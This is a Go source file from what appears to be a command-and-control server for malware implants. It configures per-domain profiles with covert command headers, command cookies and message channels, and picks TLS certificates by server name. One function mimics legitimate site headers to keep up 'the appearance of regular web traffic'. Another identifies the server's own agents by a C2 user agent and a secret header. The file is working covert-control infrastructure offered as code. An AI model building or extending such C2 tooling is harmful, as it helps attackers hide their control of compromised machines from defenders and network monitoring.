291 lines
8.3 KiB
Go
291 lines
8.3 KiB
Go
package main
|
|
|
|
import (
	"crypto/tls"
	"fmt"
	"io/ioutil"
	"log"
	"net"
	"net/http"
	"path/filepath"
	"strings"
	"time"
	"unicode/utf16"

	"gopkg.in/yaml.v2"
)
|
|
|
|
// InitConfig initializes configuration from YAML file
|
|
func InitConfig() error {
|
|
if err := LoadConfigFromYAML("config.yaml"); err != nil {
|
|
return fmt.Errorf("failed to load configuration: %v", err)
|
|
}
|
|
|
|
// Validate that we have at least one domain configured
|
|
if len(config.DomainProfiles) == 0 {
|
|
return fmt.Errorf("no domain profiles configured")
|
|
}
|
|
|
|
// Validate mandatory fields for each domain
|
|
for domain, profile := range config.DomainProfiles {
|
|
if profile.SSL.CertFile == "" {
|
|
return fmt.Errorf("domain %s missing cert_file", domain)
|
|
}
|
|
if profile.SSL.KeyFile == "" {
|
|
return fmt.Errorf("domain %s missing key_file", domain)
|
|
}
|
|
if profile.CommandHeader == "" {
|
|
return fmt.Errorf("domain %s missing command_header_name", domain)
|
|
}
|
|
if profile.CommandHeaderValue == "" {
|
|
return fmt.Errorf("domain %s missing command_header_value", domain)
|
|
}
|
|
if profile.CommandCookie == "" {
|
|
return fmt.Errorf("domain %s missing command_cookie_name", domain)
|
|
}
|
|
if profile.MessageCookieName == "" {
|
|
return fmt.Errorf("domain %s missing message_cookie_name", domain)
|
|
}
|
|
if profile.BodyMessageHeader == "" {
|
|
return fmt.Errorf("domain %s missing body_message_header", domain)
|
|
}
|
|
if profile.BodyMessageHeaderValue == "" {
|
|
return fmt.Errorf("domain %s missing body_message_header_value", domain)
|
|
}
|
|
// Ensure web_content_path is an absolute path
|
|
if profile.WebContentPath != "" {
|
|
absPath, err := filepath.Abs(profile.WebContentPath)
|
|
if err != nil {
|
|
return fmt.Errorf("domain %s has invalid web_content_path: %v", domain, err)
|
|
}
|
|
profile.WebContentPath = absPath
|
|
config.DomainProfiles[domain] = profile
|
|
}
|
|
}
|
|
|
|
// Log loaded domains
|
|
domains := make([]string, 0, len(config.DomainProfiles))
|
|
for domain := range config.DomainProfiles {
|
|
domains = append(domains, domain)
|
|
}
|
|
log.Printf("Configuration loaded with %d domains: %v", len(domains), domains)
|
|
return nil
|
|
}
|
|
|
|
// LoadConfigFromYAML loads configuration from a YAML file
|
|
func LoadConfigFromYAML(filename string) error {
|
|
data, err := ioutil.ReadFile(filename)
|
|
if err != nil {
|
|
return fmt.Errorf("failed to read config file: %v", err)
|
|
}
|
|
|
|
err = yaml.Unmarshal(data, &config)
|
|
if err != nil {
|
|
return fmt.Errorf("failed to parse YAML config: %v", err)
|
|
}
|
|
|
|
return nil
|
|
}
|
|
|
|
// createTLSConfig creates a TLS configuration with certificates for configured domains
|
|
func createTLSConfig() (*tls.Config, error) {
|
|
var certificates []tls.Certificate
|
|
certMap := make(map[string]*tls.Certificate)
|
|
|
|
// Load certificates for each configured domain
|
|
for domain, profile := range config.DomainProfiles {
|
|
if profile.SSL.CertFile == "" || profile.SSL.KeyFile == "" {
|
|
return nil, fmt.Errorf("domain %s missing SSL certificate configuration", domain)
|
|
}
|
|
|
|
cert, err := tls.LoadX509KeyPair(profile.SSL.CertFile, profile.SSL.KeyFile)
|
|
if err != nil {
|
|
return nil, fmt.Errorf("failed to load certificate for domain %s: %v", domain, err)
|
|
}
|
|
|
|
certificates = append(certificates, cert)
|
|
certMap[domain] = &cert
|
|
log.Printf("Loaded SSL certificate for domain %s: %s", domain, profile.SSL.CertFile)
|
|
}
|
|
|
|
if len(certificates) == 0 {
|
|
return nil, fmt.Errorf("no valid SSL certificates found")
|
|
}
|
|
|
|
tlsConfig := &tls.Config{
|
|
Certificates: certificates,
|
|
GetCertificate: func(clientHello *tls.ClientHelloInfo) (*tls.Certificate, error) {
|
|
serverName := clientHello.ServerName
|
|
// Check if we have a certificate for this exact domain
|
|
if cert, exists := certMap[serverName]; exists {
|
|
return cert, nil
|
|
}
|
|
// Domain not configured - reject the connection
|
|
return nil, fmt.Errorf("domain %s is not configured", serverName)
|
|
},
|
|
}
|
|
|
|
return tlsConfig, nil
|
|
}
|
|
|
|
// Add domain-specific headers to maintain appearance of regular web traffic
|
|
func addDomainHeaders(w http.ResponseWriter, profile DomainProfile) {
|
|
// Create a copy of headers to modify
|
|
headers := make(map[string]string)
|
|
for k, v := range profile.Headers {
|
|
headers[k] = v
|
|
}
|
|
|
|
// Update dynamic headers
|
|
currentTime := time.Now().UTC()
|
|
|
|
// Common headers that need dynamic values
|
|
headers["date"] = currentTime.Format(time.RFC1123)
|
|
|
|
// Domain-specific dynamic headers
|
|
if _, exists := headers["expires"]; exists {
|
|
expireTime := currentTime.Add(1 * time.Hour)
|
|
headers["expires"] = expireTime.Format(time.RFC1123)
|
|
}
|
|
|
|
// Handle set-cookie header
|
|
if cookieHeader, exists := headers["set-cookie"]; exists {
|
|
// Split multiple cookies (e.g., "test1=some_cookie_stuff; test2=some_cookie")
|
|
cookies := strings.Split(cookieHeader, ";")
|
|
for _, cookie := range cookies {
|
|
cookie = strings.TrimSpace(cookie)
|
|
if cookie == "" {
|
|
continue
|
|
}
|
|
// Split cookie into name and value (e.g., "test1=some_cookie_stuff")
|
|
parts := strings.SplitN(cookie, "=", 2)
|
|
if len(parts) != 2 {
|
|
log.Printf("Invalid cookie format in set-cookie: %s\n", cookie)
|
|
continue
|
|
}
|
|
name := strings.TrimSpace(parts[0])
|
|
value := strings.TrimSpace(parts[1])
|
|
http.SetCookie(w, &http.Cookie{
|
|
Name: name,
|
|
Value: value,
|
|
Path: "/",
|
|
Expires: time.Now().Add(24 * time.Hour),
|
|
})
|
|
}
|
|
}
|
|
|
|
// Set all headers except set-cookie (already handled)
|
|
for name, value := range headers {
|
|
if name != "set-cookie" && value != "" {
|
|
w.Header().Set(name, value)
|
|
}
|
|
}
|
|
}
|
|
|
|
// responseInterceptor wraps an http.ResponseWriter and records whether any
// response body has been written through it. Callers can then tell whether a
// handler already produced output and skip serving the normal content.
//
// This only works if handlers are given the interceptor instead of the
// original writer.
// NOTE(review): open design question — a middleware that wraps the writer once
// at the top of the handler chain would avoid threading the interceptor
// through every call site.
type responseInterceptor struct {
	http.ResponseWriter
	wroteBody bool // set on the first call to Write
}

// Write records that a body write happened and forwards b to the wrapped
// writer. The flag is set even when b is empty.
func (ri *responseInterceptor) Write(b []byte) (int, error) {
	ri.wroteBody = true
	return ri.ResponseWriter.Write(b)
}

// WroteBody reports whether Write has been called on the interceptor.
func (ri *responseInterceptor) WroteBody() bool {
	return ri.wroteBody
}

// HeaderWritten reports whether Write has been called.
//
// Despite its name, it does not track WriteHeader calls; those pass straight
// through to the embedded writer without being recorded. It is equivalent to
// WroteBody and is kept for existing callers.
func (ri *responseInterceptor) HeaderWritten() bool {
	return ri.WroteBody()
}

// Unwrap returns the wrapped writer. http.ResponseController (Go 1.20+) uses
// it to reach optional interfaces such as http.Flusher. Those interfaces are
// not visible through the interceptor itself, because embedding the
// http.ResponseWriter interface only promotes Header, Write and WriteHeader.
func (ri *responseInterceptor) Unwrap() http.ResponseWriter {
	return ri.ResponseWriter
}
|
|
|
|
// Log all incoming request details to both file and console
|
|
func logRequest(r *http.Request) {
|
|
// Format basic request info
|
|
logEntry := fmt.Sprintf("Request: %s %s from IP: %s\n", r.Method, r.URL.Path, r.RemoteAddr)
|
|
|
|
// Log User-Agent
|
|
logEntry += fmt.Sprintf("User-Agent: %s\n", r.UserAgent())
|
|
|
|
// Log all headers
|
|
logEntry += "Headers:\n"
|
|
for name, values := range r.Header {
|
|
logEntry += fmt.Sprintf(" %s: %s\n", name, strings.Join(values, ", "))
|
|
}
|
|
|
|
// Log cookies
|
|
if len(r.Cookies()) > 0 {
|
|
logEntry += "Cookies:\n"
|
|
for _, cookie := range r.Cookies() {
|
|
logEntry += fmt.Sprintf(" %s: %s\n", cookie.Name, cookie.Value)
|
|
}
|
|
}
|
|
|
|
logEntry += "-----------------------\n"
|
|
|
|
// Also log a simplified version to console
|
|
log.Printf("%s %s from %s (UA: %s)\n", r.Method, r.URL.Path, r.RemoteAddr, shortenUserAgent(r.UserAgent()))
|
|
log.Print(logEntry)
|
|
}
|
|
|
|
// GetDomainProfile returns the profile for a domain
|
|
func GetDomainProfile(domain string) (DomainProfile, bool) {
|
|
profile, exists := config.DomainProfiles[domain]
|
|
return profile, exists
|
|
}
|
|
|
|
// getDomainList returns a list of configured domains for logging
|
|
func getDomainList() []string {
|
|
var domains []string
|
|
for domain := range config.DomainProfiles {
|
|
domains = append(domains, domain)
|
|
}
|
|
return domains
|
|
}
|
|
|
|
// extractDomain returns the host portion of a Host header value, dropping any
// ":port" suffix. Brackets around an IPv6 literal with a port are also
// removed, e.g. "[::1]:443" becomes "::1".
//
// Values that net.SplitHostPort rejects are returned unchanged. This is
// typically a bare host with no port.
func extractDomain(host string) string {
	if hostname, _, splitErr := net.SplitHostPort(host); splitErr == nil {
		return hostname
	}
	// No port present (or otherwise unparsable): use the value as-is.
	return host
}
|
|
|
|
// decodeUTF16 decodes little-endian UTF-16 bytes (low byte first) into a Go
// (UTF-8) string and trims any trailing NUL characters.
//
// Surrogate pairs are combined into a single code point, so characters outside
// the Basic Multilingual Plane (e.g. emoji) decode correctly. Unpaired
// surrogates become U+FFFD. An error is returned if len(b) is odd.
func decodeUTF16(b []byte) (string, error) {
	if len(b)%2 != 0 {
		return "", fmt.Errorf("invalid UTF-16 byte length: %d", len(b))
	}

	units := make([]uint16, len(b)/2)
	for i := range units {
		units[i] = uint16(b[2*i]) | uint16(b[2*i+1])<<8
	}

	// Trim null terminator(s) and convert to string
	return strings.TrimRight(string(utf16.Decode(units)), "\x00"), nil
}
|
|
|
|
// shortenUserAgent truncates ua for compact console output.
//
// Strings of at most 30 bytes are returned unchanged. Longer ones are cut to
// at most 27 bytes and suffixed with "...". The cut is moved back to a rune
// boundary so a multi-byte UTF-8 character is never split, which would
// otherwise write invalid UTF-8 into the log.
func shortenUserAgent(ua string) string {
	const (
		maxLen = 30
		keep   = maxLen - len("...") // 27 bytes of the original survive
	)
	if len(ua) <= maxLen {
		return ua
	}
	// Ranging over a string yields the byte offset of each rune start. Keep
	// the last offset <= keep so that ua[:cut] ends on a rune boundary.
	cut := 0
	for i := range ua {
		if i > keep {
			break
		}
		cut = i
	}
	return ua[:cut] + "..."
}
|
|
|
|
// Identify if the request is from our agent
|
|
func IdentifyAgent(r *http.Request) bool {
|
|
// Check for our specific user agent
|
|
if !strings.Contains(r.UserAgent(), config.C2AgentUserAgent) {
|
|
return false
|
|
}
|
|
|
|
// Check for our identification header and value
|
|
headerValue := r.Header.Get(config.C2IdentificationHeader)
|
|
return headerValue == config.C2IdentificationValue
|
|
}
|